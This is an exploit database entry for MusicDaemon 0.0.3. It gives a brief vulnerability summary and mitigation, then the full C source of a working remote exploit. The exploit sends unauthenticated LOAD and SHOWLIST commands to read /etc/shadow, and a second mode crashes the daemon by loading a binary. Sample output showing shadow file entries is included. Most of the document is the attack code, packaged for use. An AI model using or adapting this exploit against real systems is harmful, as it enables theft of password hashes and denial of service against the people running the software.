MusicDaemon - exploit.company

vendor:

MusicDaemon

by:

Tal0n

7.5

CVSS

HIGH

Remote File Disclosure

200

CWE

Product Name: MusicDaemon

Affected Version From: 0.0.3

Affected Version To: 0.0.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Slackware 9, Redhat 9

2004

MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS

This exploit allows an attacker to remotely steal the /etc/shadow file from a vulnerable MusicDaemon version 0.0.3. The vulnerability does not require shellcode or return addresses and works by exploiting the lack of authentication and privilege checks in the application. By sending specific commands to the MusicDaemon, an attacker can retrieve sensitive system files such as /etc/shadow.

Mitigation:

To mitigate this vulnerability, it is recommended to update MusicDaemon to a secure version that includes proper authentication and privilege checks. Additionally, ensure that MusicDaemon is not running as the root user.

Source

Exploit-DB raw data:

/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS 
* Vulnerability discovered by: Tal0n 05-22-04 
* Exploit code by: Tal0n 05-22-04 
* 
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz, 
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires, 
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g 
* 
* MusicDaemon MUST be running as root, which it does by default anyways. 
* Tested on Slackware 9 and Redhat 9, but should work generically since the 
* nature of this vulnerability doesn't require 
* shellcode or return addresses. 
* 
* 
* Client Side View: 
* 
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow 
* 
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer 
* 
* Connected to 127.0.0.1:1234... 
* Sending exploit data... 
* 
* <*** /etc/shadow file from 127.0.0.1 ***> 
* 
* Hello 
* <snipped for privacy> 
* ...... 
* bin:*:9797:0::::: 
* ftp:*:9797:0::::: 
* sshd:*:9797:0::::: 
* ...... 
* </snipped for privacy> 
* 
* <*** End /etc/shadow file ***> 
* 
* root@vortex:~/test# 
* 
* Server Side View: 
* 
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234 
* Using configuration: ../musicd.conf 
* [Mon May 17 05:26:07 2004] cmd_set() called 
* Binding to port 5555. 
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234. 
* [Mon May 17 05:26:11 2004] New connection! 
* [Mon May 17 05:26:11 2004] cmd_load() called 
* [Mon May 17 05:26:13 2004] cmd_show() called 
* [Mon May 17 05:26:20 2004] Client lost. 
* 
* 
* As you can see, it simply makes a connection, sends the commands, and 
* leaves. MusicDaemon doesn't even log that new connection's IPs that I 
* know of. Works very well, eh? :) 
* 
* The vulnerability is in where the is no authenciation for 1. For 2, it 
* will let you "LOAD" any file on the box if you have the correct privledges, 
* and by default, as I said before, it runs as root, unless you change the 
* configuration file to make it run as a different user. 
* 
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab 
* the contents of the actual file. You can subtitute any file you want in 
* for /etc/shadow, I just coded it to grab it because it being such an 
* important system file if you know what I mean ;). 
* 
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST", 
* it will crash music daemon. 
* 
* 
*/ 
  
  
#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
  
int main(int argc, char *argv[]) { 
  
char buffer[16384]; 
  
char *xpldata1 = "LOAD /etc/shadow\r\n"; 
char *xpldata2 = "SHOWLIST\r\n"; 
char *xpldata3 = "CLEAR\r\n"; 
char *dosdata1 = "LOAD /bin/cat\r\n"; 
char *dosdata2 = "SHOWLIST\r\n"; 
char *dosdata3 = "CLEAR\r\n"; 
  
int len1 = strlen(xpldata1); 
int len2 = strlen(xpldata2); 
int len3 = strlen(xpldata3); 
int len4 = strlen(dosdata1); 
int len5 = strlen(dosdata2); 
int len6 = strlen(dosdata3); 
  
if(argc !=  4) { 
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow 
Stealer / DoS"); 
printf("\nDiscovered and Coded by: Tal0n 
05-22-04\n"); 
printf("\nUsage: %s <host> <port> <option>\n", 
argv[0]); 
printf("\nOptions:"); 
printf("\n\t\tshadow - Steal /etc/shadow file"); 
printf("\n\t\tdos - DoS Music Daemon\n\n"); 
return 0; } 
  
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow 
Stealer / DoS\n\n"); 
  
int sock; 
struct sockaddr_in remote; 
  
remote.sin_family = AF_INET; 
remote.sin_port = htons(atoi(argv[2])); 
remote.sin_addr.s_addr = inet_addr(argv[1]); 
  
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { 
printf("\nError: Can't create socket!\n\n"); 
return -1; } 
  
if(connect(sock,(struct sockaddr *)&remote, 
sizeof(struct sockaddr)) < 0) { 
printf("\nError: Can't connect to %s:%s!\n\n", 
argv[1], argv[2]); 
return -1; } 
  
printf("Connected to %s:%s...\n", argv[1], argv[2]); 
  
if(strcmp(argv[3], "dos") == 0) { 
  
printf("Sending DoS data...\n"); 
  
send(sock, dosdata1, len4, 0); 
  
sleep(2); 
  
send(sock, dosdata2, len5, 0); 
  
sleep(2); 
  
send(sock, dosdata3, len6, 0); 
  
printf("\nTarget %s DoS'd!\n\n", argv[1]); 
  
return 0; } 
  
if(strcmp(argv[3], "shadow") == 0) { 
  
printf("Sending exploit data...\n"); 
  
send(sock, xpldata1, len1, 0); 
  
sleep(2); 
  
send(sock, xpldata2, len2, 0); 
  
sleep(5); 
  
printf("Done! Grabbing /etc/shadow...\n"); 
  
memset(buffer, 0, sizeof(buffer)); 
read(sock, buffer, sizeof(buffer)); 
  
sleep(2); 
  
printf("\n<*** /etc/shadow file from %s ***>\n\n", 
argv[1]); 
printf("%s", buffer); 
printf("\n<*** End /etc/shadow file ***>\n\n"); 
  
send(sock, xpldata3, len3, 0); 
  
sleep(1); 
  
close(sock); 
  
return 0; } 
  
return 0; } 

// milw0rm.com [2004-08-24]